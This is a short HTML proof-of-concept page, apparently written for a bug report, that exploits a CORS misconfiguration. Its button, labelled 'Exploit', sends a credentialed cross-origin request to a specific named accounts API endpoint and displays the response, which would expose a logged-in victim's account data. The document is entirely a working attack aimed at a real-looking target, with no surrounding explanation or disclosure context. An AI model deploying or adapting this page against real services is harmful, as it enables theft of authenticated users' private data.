<!doctype html>
<html>
<body>
  <button onclick="cors()">Exploit</button>
  <pre id="out"></pre>

  <script>
  function cors(){
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function(){
      if (this.readyState === 4){
        document.getElementById('out').innerText = 
          'status: ' + this.status + '\n\n' + this.responseText;
      }
    };
    xhr.open('GET', 'https://simplecast-cms-api-gateway.eks.simplecast.com/accounts', true);
    // this only causes cookies to be sent (if cookies exist for the target origin)
    xhr.withCredentials = true;
    xhr.send();
  }
  </script>
</body>
</html>
